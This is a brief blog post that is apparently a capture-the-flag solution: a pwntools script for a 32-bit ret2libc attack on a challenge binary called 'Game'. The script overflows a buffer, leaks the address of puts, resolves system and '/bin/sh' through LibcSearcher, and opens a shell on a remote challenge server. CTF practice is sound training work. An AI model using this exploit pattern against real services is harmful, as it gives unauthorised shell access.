pwn-Game(32位ret2libc)

from pwn import *
from LibcSearcher import *
#p = process("./Game")
p = remote("1.95.36.136", 2066)
elf = ELF("./Game")
p.sendlineafter(b"Do you play game?\n",b"yes")
p.sendlineafter(b"Do you think playing games will affect your learning?\n",b"yes")
got = elf.got["puts"]
plt = elf.plt["puts"]
star = 0x80485f4
payload = b'a'*(0x6c+4)+p32(plt)+p32(star)+p32(got)
p.sendline(payload)
p.recvline()
p.recvline()
puts = u32(p.recv(4))
print("puts=",puts)
libc = LibcSearcher("puts",puts)
base = puts - libc.dump("puts")
sys = base + libc.dump("system")
sh = base + libc.dump("str_bin_sh")
payload2 = b'a'*(0x6c+4)+p32(sys)+p32(0)+p32(sh)
p.sendline(payload2)
#gdb.attach(p)
p.interactive()

posted @ 2025-04-26 21:52 lethe311 阅读(5) 评论(0) 收藏举报

刷新页面返回顶部

lethe311

pwn-Game(32位ret2libc)

公告